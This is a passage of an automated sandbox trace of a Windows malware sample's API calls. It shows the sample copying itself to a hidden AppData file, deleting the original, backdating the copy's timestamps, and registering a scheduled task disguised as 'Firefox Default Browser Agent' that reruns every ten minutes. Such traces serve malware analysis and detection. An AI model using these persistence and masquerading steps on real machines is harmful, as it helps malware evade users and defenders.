phProv=0x814f718*=0x3f7e720) returned 1 [0109.444] CryptCreateHash (in: hProv=0x3f7e720, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x814f710 | out: phHash=0x814f710) returned 1 [0109.445] lstrlenA (lpString="Q9IATRKPRH99FC78698443A5AF") returned 26 [0109.445] CryptHashData (hHash=0x3fe2430, pbData=0x82f12f0, dwDataLen=0x1a, dwFlags=0x0) returned 1 [0109.445] CryptGetHashParam (in: hHash=0x3fe2430, dwParam=0x2, pbData=0x814f720, pdwDataLen=0x814f750, dwFlags=0x0 | out: pbData=0x814f720, pdwDataLen=0x814f750) returned 1 [0109.445] wsprintfA (in: param_1=0x27a020c, param_2="%02X" | out: param_1="4B") returned 2 [0109.445] wsprintfA (in: param_1=0x27a020e, param_2="%02X" | out: param_1="CD") returned 2 [0109.445] wsprintfA (in: param_1=0x27a0210, param_2="%02X" | out: param_1="65") returned 2 [0109.445] wsprintfA (in: param_1=0x27a0212, param_2="%02X" | out: param_1="9A") returned 2 [0109.445] wsprintfA (in: param_1=0x27a0214, param_2="%02X" | out: param_1="D8") returned 2 [0109.445] wsprintfA (in: param_1=0x27a0216, param_2="%02X" | out: param_1="F3") returned 2 [0109.445] wsprintfA (in: param_1=0x27a0218, param_2="%02X" | out: param_1="47") returned 2 [0109.445] wsprintfA (in: param_1=0x27a021a, param_2="%02X" | out: param_1="B5") returned 2 [0109.445] wsprintfA (in: param_1=0x27a021c, param_2="%02X" | out: param_1="B4") returned 2 [0109.445] wsprintfA (in: param_1=0x27a021e, param_2="%02X" | out: param_1="51") returned 2 [0109.445] wsprintfA (in: param_1=0x27a0220, param_2="%02X" | out: param_1="91") returned 2 [0109.445] wsprintfA (in: param_1=0x27a0222, param_2="%02X" | out: param_1="8C") returned 2 [0109.445] wsprintfA (in: param_1=0x27a0224, param_2="%02X" | out: param_1="D8") returned 2 [0109.445] wsprintfA (in: param_1=0x27a0226, param_2="%02X" | out: param_1="91") returned 2 [0109.445] wsprintfA (in: param_1=0x27a0228, param_2="%02X" | out: param_1="C8") returned 2 [0109.445] wsprintfA (in: param_1=0x27a022a, param_2="%02X" | out: param_1="23") returned 2 [0109.445] CryptDestroyHash (hHash=0x3fe2430) returned 1 [0109.446] CryptReleaseContext (hProv=0x3f7e720, dwFlags=0x0) returned 1 [0109.446] wsprintfA (in: param_1=0x27a022c, param_2="%08X" | out: param_1="8443A5AF") returned 8 [0109.446] RtlSizeHeap (HeapHandle=0x82f0000, Flags=0x0, MemoryPointer=0x82f1330) returned 0x14 [0109.446] RtlFreeHeap (HeapHandle=0x82f0000, Flags=0x0, BaseAddress=0x82f1330) returned 1 [0109.446] RtlSizeHeap (HeapHandle=0x82f0000, Flags=0x0, MemoryPointer=0x82f12f0) returned 0x29 [0109.446] RtlFreeHeap (HeapHandle=0x82f0000, Flags=0x0, BaseAddress=0x82f12f0) returned 1 [0109.446] RtlAllocateHeap (HeapHandle=0x82f0000, Flags=0x8, Size=0xe) returned 0x82f12f0 [0109.446] wsprintfA (in: param_1=0x27a0dbe, param_2="%sFF" | out: param_1="4BCD659AD8F347B5B451918CD891C8238443A5AFFF") returned 42 [0109.446] RtlSizeHeap (HeapHandle=0x82f0000, Flags=0x0, MemoryPointer=0x82f12f0) returned 0xe [0109.446] RtlFreeHeap (HeapHandle=0x82f0000, Flags=0x0, BaseAddress=0x82f12f0) returned 1 [0109.447] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="4BCD659AD8F347B5B451918CD891C8238443A5AF") returned 0x6d4 [0109.447] RtlGetLastWin32Error () returned 0x0 [0109.447] GetTickCount () returned 0x1706abb [0109.447] RtlAllocateHeap (HeapHandle=0x82f0000, Flags=0x8, Size=0x1008) returned 0x82f12f0 [0109.448] RtlAllocateHeap (HeapHandle=0x82f0000, Flags=0x8, Size=0x2e) returned 0x82f2300 [0109.448] RegOpenKeyExA (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x814f7d8 | out: phkResult=0x814f7d8*=0x149c) returned 0x0 [0109.448] RtlAllocateHeap (HeapHandle=0x82f0000, Flags=0x8, Size=0x14) returned 0x82f2340 [0109.448] RegQueryValueExA (in: hKey=0x149c, lpValueName="svcVersion", lpReserved=0x0, lpType=0x0, lpData=0x814f760, lpcbData=0x814f7c0*=0x20 | out: lpType=0x0, lpData=0x814f760*=0x0, lpcbData=0x814f7c0*=0x20) returned 0x2 [0109.448] RtlSizeHeap (HeapHandle=0x82f0000, Flags=0x0, MemoryPointer=0x82f2340) returned 0x14 [0109.448] RtlFreeHeap (HeapHandle=0x82f0000, Flags=0x0, BaseAddress=0x82f2340) returned 1 [0109.448] RtlAllocateHeap (HeapHandle=0x82f0000, Flags=0x8, Size=0x11) returned 0x82f2340 [0109.449] RegQueryValueExA (in: hKey=0x149c, lpValueName="Version", lpReserved=0x0, lpType=0x0, lpData=0x814f760, lpcbData=0x814f7c0*=0x20 | out: lpType=0x0, lpData=0x814f760*=0x38, lpcbData=0x814f7c0*=0xf) returned 0x0 [0109.449] RtlSizeHeap (HeapHandle=0x82f0000, Flags=0x0, MemoryPointer=0x82f2340) returned 0x11 [0109.449] RtlFreeHeap (HeapHandle=0x82f0000, Flags=0x0, BaseAddress=0x82f2340) returned 1 [0109.449] lstrlenA (lpString="8.0.7601.17514") returned 14 [0109.449] lstrlenA (lpString=".") returned 1 [0109.449] atoi (_Str="8") returned 8 [0109.449] RegCloseKey (hKey=0x149c) returned 0x0 [0109.449] RtlSizeHeap (HeapHandle=0x82f0000, Flags=0x0, MemoryPointer=0x82f2300) returned 0x2e [0109.449] RtlFreeHeap (HeapHandle=0x82f0000, Flags=0x0, BaseAddress=0x82f2300) returned 1 [0109.449] ObtainUserAgentString (in: dwOption=0x8, pszUAOut=0x82f12f0, cbSize=0x814f7c0 | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)", cbSize=0x814f7c0) returned 0x0 [0109.457] lstrlenA (lpString="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)") returned 183 [0109.457] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x82f12f0, cbMultiByte=184, lpWideCharStr=0x27a0577, cchWideChar=368 | out: lpWideCharStr="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)") returned 184 [0109.457] RtlSizeHeap (HeapHandle=0x82f0000, Flags=0x0, MemoryPointer=0x82f12f0) returned 0x1008 [0109.457] RtlFreeHeap (HeapHandle=0x82f0000, Flags=0x0, BaseAddress=0x82f12f0) returned 1 [0109.457] RtlAllocateHeap (HeapHandle=0x82f0000, Flags=0x8, Size=0x1008) returned 0x82f12f0 [0109.458] RtlAllocateHeap (HeapHandle=0x82f0000, Flags=0x8, Size=0x1c) returned 0x82f2300 [0109.458] ExpandEnvironmentStringsW (in: lpSrc="%APPDATA%", lpDst=0x82f12f0, nSize=0x105 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Roaming") returned 0x23 [0109.458] RtlSizeHeap (HeapHandle=0x82f0000, Flags=0x0, MemoryPointer=0x82f2300) returned 0x1c [0109.458] RtlFreeHeap (HeapHandle=0x82f0000, Flags=0x0, BaseAddress=0x82f2300) returned 1 [0109.458] RtlAllocateHeap (HeapHandle=0x82f0000, Flags=0x8, Size=0x16) returned 0x82f2300 [0109.458] wsprintfW (in: param_1=0x27a07a6, param_2="%s\\%hs" | out: param_1="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\cdieedr") returned 42 [0109.458] wsprintfW (in: param_1=0x27a0bb6, param_2="%s\\%hs" | out: param_1="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\estugfj") returned 42 [0109.458] RtlSizeHeap (HeapHandle=0x82f0000, Flags=0x0, MemoryPointer=0x82f2300) returned 0x16 [0109.458] RtlFreeHeap (HeapHandle=0x82f0000, Flags=0x0, BaseAddress=0x82f2300) returned 1 [0109.458] RtlAllocateHeap (HeapHandle=0x82f0000, Flags=0x8, Size=0x26) returned 0x82f2300 [0109.458] lstrlenA (lpString="http://file-coin-host-12.com/") returned 29 [0109.458] RtlComputeCrc32 (PartialCrc=0x0, Buffer=0x82f2300, Length=0x1d) returned 0x57488b3e [0109.458] RtlSizeHeap (HeapHandle=0x82f0000, Flags=0x0, MemoryPointer=0x82f2300) returned 0x26 [0109.459] RtlFreeHeap (HeapHandle=0x82f0000, Flags=0x0, BaseAddress=0x82f2300) returned 1 [0109.459] lstrcmpW (lpString1="C:\\Users\\kEecfMwgj\\Desktop\\eb023c854d3c8a24589e9294fd5d346e.virus.exe", lpString2="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\cdieedr") returned 1 [0109.459] DeleteFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\cdieedr" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\cdieedr")) returned 0 [0109.459] CopyFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\eb023c854d3c8a24589e9294fd5d346e.virus.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\eb023c854d3c8a24589e9294fd5d346e.virus.exe"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\cdieedr" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\cdieedr"), bFailIfExists=0) returned 1 [0109.531] DeleteFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\eb023c854d3c8a24589e9294fd5d346e.virus.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\eb023c854d3c8a24589e9294fd5d346e.virus.exe")) returned 1 [0109.538] RtlAllocateHeap (HeapHandle=0x82f0000, Flags=0x8, Size=0x12) returned 0x82f2300 [0109.538] RtlAllocateHeap (HeapHandle=0x82f0000, Flags=0x8, Size=0x2a) returned 0x82f2320 [0109.539] RtlAllocateHeap (HeapHandle=0x82f0000, Flags=0x8, Size=0x408) returned 0x82f2360 [0109.539] wsprintfW (in: param_1=0x82f2360, param_2="%s%s" | out: param_1="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\cdieedr:Zone.Identifier") returned 58 [0109.539] DeleteFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\cdieedr:Zone.Identifier" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\cdieedr:zone.identifier")) returned 0 [0109.539] RtlSizeHeap (HeapHandle=0x82f0000, Flags=0x0, MemoryPointer=0x82f2360) returned 0x408 [0109.539] RtlFreeHeap (HeapHandle=0x82f0000, Flags=0x0, BaseAddress=0x82f2360) returned 1 [0109.539] RtlSizeHeap (HeapHandle=0x82f0000, Flags=0x0, MemoryPointer=0x82f2300) returned 0x12 [0109.539] RtlFreeHeap (HeapHandle=0x82f0000, Flags=0x0, BaseAddress=0x82f2300) returned 1 [0109.539] RtlSizeHeap (HeapHandle=0x82f0000, Flags=0x0, MemoryPointer=0x82f2320) returned 0x2a [0109.540] RtlFreeHeap (HeapHandle=0x82f0000, Flags=0x0, BaseAddress=0x82f2320) returned 1 [0109.540] RtlAllocateHeap (HeapHandle=0x82f0000, Flags=0x8, Size=0x16) returned 0x82f2300 [0109.540] RtlAllocateHeap (HeapHandle=0x82f0000, Flags=0x8, Size=0x210) returned 0x82f2320 [0109.540] GetSystemDirectoryA (in: lpBuffer=0x82f2320, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0109.540] lstrcatA (in: lpString1="C:\\Windows\\system32", lpString2="\\" | out: lpString1="C:\\Windows\\system32\\") returned="C:\\Windows\\system32\\" [0109.540] lstrcatA (in: lpString1="C:\\Windows\\system32\\", lpString2="advapi32.dll" | out: lpString1="C:\\Windows\\system32\\advapi32.dll") returned="C:\\Windows\\system32\\advapi32.dll" [0109.540] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\cdieedr", dwFileAttributes=0x6) returned 1 [0109.541] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\cdieedr" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\cdieedr"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0x149c [0109.541] GetFileAttributesExA (in: lpFileName="C:\\Windows\\system32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll"), fInfoLevelId=0x0, lpFileInformation=0x814f730 | out: lpFileInformation=0x814f730*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe03daea9, ftCreationTime.dwHighDateTime=0x1ca041b, ftLastAccessTime.dwLowDateTime=0xe03daea9, ftLastAccessTime.dwHighDateTime=0x1ca041b, ftLastWriteTime.dwLowDateTime=0xb36110, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0xd6200)) returned 1 [0109.541] SetFileTime (hFile=0x149c, lpCreationTime=0x814f734, lpLastAccessTime=0x814f73c, lpLastWriteTime=0x814f744) returned 1 [0109.541] CloseHandle (hObject=0x149c) returned 1 [0109.541] RtlSizeHeap (HeapHandle=0x82f0000, Flags=0x0, MemoryPointer=0x82f2320) returned 0x210 [0109.541] RtlFreeHeap (HeapHandle=0x82f0000, Flags=0x0, BaseAddress=0x82f2320) returned 1 [0109.542] RtlSizeHeap (HeapHandle=0x82f0000, Flags=0x0, MemoryPointer=0x82f2300) returned 0x16 [0109.542] RtlFreeHeap (HeapHandle=0x82f0000, Flags=0x0, BaseAddress=0x82f2300) returned 1 [0109.542] RtlAllocateHeap (HeapHandle=0x82f0000, Flags=0x8, Size=0x418) returned 0x82f2300 [0109.542] lstrcatW (in: lpString1="", lpString2="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\cdieedr" | out: lpString1="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\cdieedr") returned="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\cdieedr" [0109.542] RtlAllocateHeap (HeapHandle=0x82f0000, Flags=0x8, Size=0x212) returned 0x82f2720 [0109.542] GetUserNameW (in: lpBuffer=0x82f2720, pcbBuffer=0x814f770 | out: lpBuffer="kEecfMwgj", pcbBuffer=0x814f770) returned 1 [0109.543] RtlAllocateHeap (HeapHandle=0x82f0000, Flags=0x8, Size=0x10d) returned 0x82f2940 [0109.543] RtlAllocateHeap (HeapHandle=0x82f0000, Flags=0x8, Size=0x4c) returned 0x82f2a60 [0109.543] RtlAllocateHeap (HeapHandle=0x82f0000, Flags=0x8, Size=0x10d) returned 0x82f2ac0 [0109.543] wsprintfW (in: param_1=0x82f2940, param_2="Firefox Default Browser Agent %hs" | out: param_1="Firefox Default Browser Agent 4BCD659AD8F347B5") returned 46 [0109.543] RtlSizeHeap (HeapHandle=0x82f0000, Flags=0x0, MemoryPointer=0x82f2ac0) returned 0x10d [0109.544] RtlFreeHeap (HeapHandle=0x82f0000, Flags=0x0, BaseAddress=0x82f2ac0) returned 1 [0109.544] RtlSizeHeap (HeapHandle=0x82f0000, Flags=0x0, MemoryPointer=0x82f2a60) returned 0x4c [0109.544] RtlFreeHeap (HeapHandle=0x82f0000, Flags=0x0, BaseAddress=0x82f2a60) returned 1 [0109.544] CoCreateInstance (in: rclsid=0x36c1010*(Data1=0xf87369f, Data2=0xa4e5, Data3=0x4cfc, Data4=([0]=0xbd, [1]=0x3e, [2]=0x73, [3]=0xe6, [4]=0x15, [5]=0x45, [6]=0x72, [7]=0xdd)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x36c1000*(Data1=0x2faba4c7, Data2=0x4da9, Data3=0x4013, Data4=([0]=0x96, [1]=0x97, [2]=0x20, [3]=0xcc, [4]=0x3f, [5]=0xd4, [6]=0xf, [7]=0x85)), ppv=0x814f608 | out: ppv=0x814f608*=0x12b900) returned 0x0 [0109.546] TaskScheduler:ITaskService:Connect (This=0x12b900, serverName=0x814f680*(varType=0x0, wReserved1=0x27a, wReserved2=0x0, wReserved3=0x0, varVal1=0x36c5257, varVal2=0x0), user=0x814f6a0*(varType=0x0, wReserved1=0x27a, wReserved2=0x0, wReserved3=0x0, varVal1=0x36c5257, varVal2=0x0), domain=0x814f660*(varType=0x0, wReserved1=0x27a, wReserved2=0x0, wReserved3=0x0, varVal1=0x36c5257, varVal2=0x0), password=0x814f6e0*(varType=0x0, wReserved1=0x27a, wReserved2=0x0, wReserved3=0x0, varVal1=0x36c5257, varVal2=0x0)) returned 0x0 [0109.571] TaskScheduler:ITaskService:GetFolder (in: This=0x12b900, Path="", ppFolder=0x814f628 | out: ppFolder=0x814f628*=0x126180) returned 0x0 [0109.573] ITaskFolder:DeleteTask (This=0x126180, Name="Firefox Default Browser Agent 4BCD659AD8F347B5", flags=0) returned 0x80070002 [0109.574] TaskScheduler:ITaskService:NewTask (in: This=0x12b900, flags=0x0, ppDefinition=0x814f740 | out: ppDefinition=0x814f740*=0x12d9a0) returned 0x0 [0109.575] ITaskDefinition:get_RegistrationInfo (in: This=0x12d9a0, ppRegistrationInfo=0x814f640 | out: ppRegistrationInfo=0x814f640*=0x12da60) returned 0x0 [0109.575] IRegistrationInfo:put_Author (This=0x12da60, Author="kEecfMwgj") returned 0x0 [0109.575] IUnknown:Release (This=0x12da60) returned 0x1 [0109.575] ITaskDefinition:get_Settings (in: This=0x12d9a0, ppSettings=0x814f618 | out: ppSettings=0x814f618*=0x12db90) returned 0x0 [0109.576] ITaskSettings:put_StartWhenAvailable (This=0x12db90, StartWhenAvailable=1) returned 0x0 [0109.576] IUnknown:Release (This=0x12db90) returned 0x1 [0109.576] ITaskDefinition:get_Triggers (in: This=0x12d9a0, ppTriggers=0x814f620 | out: ppTriggers=0x814f620*=0x12db20) returned 0x0 [0109.576] ITriggerCollection:Create (in: This=0x12db20, Type=1, ppTrigger=0x814f730 | out: ppTrigger=0x814f730*=0x12dcf0) returned 0x0 [0109.576] IUnknown:QueryInterface (in: This=0x12dcf0, riid=0x36c1030*(Data1=0xb45747e0, Data2=0xeba7, Data3=0x4276, Data4=([0]=0x9f, [1]=0x29, [2]=0x85, [3]=0xc5, [4]=0xbb, [5]=0x30, [6]=0x0, [7]=0x6)), ppvObject=0x814f610 | out: ppvObject=0x814f610*=0x12dcf0) returned 0x0 [0109.576] ITrigger:get_Repetition (in: This=0x12dcf0, ppRepeat=0x814f600 | out: ppRepeat=0x814f600*=0x12ca60) returned 0x0 [0109.576] RtlAllocateHeap (HeapHandle=0x82f0000, Flags=0x8, Size=0x14) returned 0x82f2a60 [0109.576] IRepetitionPattern:put_Interval (This=0x12ca60, Interval="PT10M") returned 0x0 [0109.578] ITrigger:put_Repetition (This=0x12dcf0, Repetition=0x12ca60) returned 0x0 [0109.578] IUnknown:Release (This=0x12ca60) returned 0x1 [0109.578] RtlAllocateHeap (HeapHandle=0x82f0000, Flags=0x8, Size=0x30) returned 0x82f2a80 [0109.578] ITrigger:put_StartBoundary (This=0x12dcf0, StartBoundary="1999-11-30T00:00:00") returned 0x0 [0109.578] IUnknown:Release (This=0x12dcf0) returned 0x2 [0109.578] RtlSizeHeap (HeapHandle=0x82f0000, Flags=0x0, MemoryPointer=0x82f2a80) returned 0x30 [0109.578] RtlFreeHeap (HeapHandle=0x82f0000, Flags=0x0, BaseAddress=0x82f2a80) returned 1 [0109.578] RtlSizeHeap (HeapHandle=0x82f0000, Flags=0x0, MemoryPointer=0x82f2a60) returned 0x14 [0109.578] RtlFreeHeap (HeapHandle=0x82f0000, Flags=0x0, BaseAddress=0x82f2a60) returned 1 [0109.578] IUnknown:Release (This=0x12dcf0) returned 0x1 [0109.578] ITriggerCollection:Create (in: This=0x12db20, Type=9, ppTrigger=0x814f730 | out: ppTrigger=0x814f730*=0x12dd80) returned 0x0 [0109.580] IUnknown:QueryInterface (in: This=0x12dd80, riid=0x36c1020*(Data1=0x72dade38, Data2=0xfae4, Data3=0x4b3e, Data4=([0]=0xba, [1]=0xf4, [2]=0x5d, [3]=0x0, [4]=0x9a, [5]=0xf0, [6]=0x2b, [7]=0x1c)), ppvObject=0x814f600 | out: ppvObject=0x814f600*=0x12dd80) returned 0x0 [0109.580] ILogonTrigger:put_UserId (This=0x12dd80, UserId="kEecfMwgj") returned 0x0 [0109.583] IUnknown:Release (This=0x12dd80) returned 0x2 [0109.583] IUnknown:Release (This=0x12dd80) returned 0x1 [0109.583] ITaskDefinition:get_Actions (in: This=0x12d9a0, ppActions=0x814f630 | out: ppActions=0x814f630*=0x10d5d0) returned 0x0 [0109.583] IActionCollection:Create (in: This=0x10d5d0, Type=0, ppAction=0x814f648 | out: ppAction=0x814f648*=0x12de10) returned 0x0 [0109.583] IUnknown:Release (This=0x10d5d0) returned 0x1 [0109.583] IUnknown:QueryInterface (in: This=0x12de10, riid=0x36c1040*(Data1=0x4c3d624d, Data2=0xfd6b, Data3=0x49a3, Data4=([0]=0xb9, [1]=0xb7, [2]=0x9, [3]=0xcb, [4]=0x3c, [5]=0xd3, [6]=0xf0, [7]=0x47)), ppvObject=0x814f638 | out: ppvObject=0x814f638*=0x12de10) returned 0x0 [0109.583] IExecAction:put_Path (This=0x12de10, Path="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\cdieedr") returned 0x0 [0109.583] IUnknown:Release (This=0x12de10) returned 0x2 [0109.583] ITaskFolder:RegisterTaskDefinition (in: This=0x126180, Path="Firefox Default Browser Agent 4BCD659AD8F347B5", pDefinition=0x12d9a0, flags=6, UserId=0x814f660*(varType=0x0, wReserved1=0x27a, wReserved2=0x0, wReserved3=0x0, varVal1=0x36c5257, varVal2=0x0), password=0x814f6a0*(varType=0x0, wReserved1=0x27a, wReserved2=0x0, wReserved3=0x0, varVal1=0x36c5257, varVal2=0x0), LogonType=3, sddl=0x814f680*(varType=0x0, wReserved1=0x27a, wReserved2=0x0, wReserved3=0x0, varVal1=0x36c5257, varVal2=0x0), ppTask=0x814f600 | out: ppTask=0x814f600*=0x143840) returned 0x0 [0109.668] IUnknown:Release (This=0x12de10) returned 0x1 [0109.668] IUnknown:Release (This=0x12db20) returned 0x1 [0109.668] TaskScheduler:IUnknown:Release (This=0x12d9a0) returned 0x0 [0109.668] TaskScheduler:IUnknown:Release (This=0x126180) returned 0x0 [0109.668] TaskScheduler:IUnknown:Release (This=0x12b900) returned 0x0 [0109.668] RtlSizeHeap (HeapHandle=0x82f0000, Flags=0x0, MemoryPointer=0x82f2940) returned 0x10d [0109.669] RtlFreeHeap (HeapHandle=0x82f0000, Flags=0x0, BaseAddress=0x82f2940) returned 1 [0109.669] RtlSizeHeap (HeapHandle=0x82f0000, Flags=0x0, MemoryPointer=0x82f2300) returned 0x418 [0109.669] RtlFreeHeap (HeapHandle=0x82f0000, Flags=0x0, BaseAddress=0x82f2300) returned 1 [0109.669] RtlSizeHeap (HeapHandle=0x82f0000, Flags=0x0, MemoryPointer=0x82f2720) returned 0x212 [0109.669] RtlFreeHeap (HeapHandle=0x82f0000, Flags=0x0, BaseAddress=0x82f2720) returned 1 [0109.670] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\cdieedr" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\cdieedr"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c8 [0109.670] CreateFileMappingA (hFile=0x0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xfa000, lpName="4BCD659AD8F347B5B451918CD891C8238443A5AFFF") returned 0x1490 [0109.670] RtlAllocateHeap (HeapHandle=0x82f0000, Flags=0x8, Size=0x26) returned 0x82f2300 [0109.670] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\estugfj" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\estugfj"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0109.671] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3026b562 [0109.671] RtlAllocateHeap (HeapHandle=0x82f0000, Flags=0x8, Size=0x46) returned 0x82f2330 [0109.671] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x39490312 [0109.671] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x738b4355 [0109.671] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x32440e6f [0109.671] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x692b816a [0109.671] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xc3e0613 [0109.671] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7736a268 [0109.671] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3c413cb4 [0109.671] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2b87d11b [0109.671] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x78b1bbc9 [0109.671] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5c750e3f [0109.671] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x370043b2 [0109.671] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1d473ed9 [0109.671] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x50f88db4 [0109.671] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x51ec0134 [0109.671] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1e2248f7 [0109.671] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2d2047e [0109.671] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x51d0c8b2 [0109.671] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3d67ea10 [0109.671] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1b0fcf2e [0109.671] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2faff2b6 [0109.671] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x63eef08a [0109.671] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x20d60f93 [0109.671] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2c0eb4d0 [0109.672] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x135179da [0109.672] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x21fb3d38 [0109.672] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x23a3926c [0109.672] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x176a31d2 [0109.672] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7847bb47 [0109.672] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3c06d1c1 [0109.672] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7e212a27 [0109.672] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x390b1c29 [0109.672] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3636bd05 [0109.672] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x603543b9 [0109.672] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x431a8c32 [0109.672] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x151887bc [0109.672] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x378440d7 [0109.672] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xe2b8eea [0109.672] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x24456e6d [0109.672] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1193b33 [0109.672] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x21f95e97 [0109.672] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x72a0a57f [0109.672] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7ae627dc [0109.672] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x15d24c4c [0109.672] 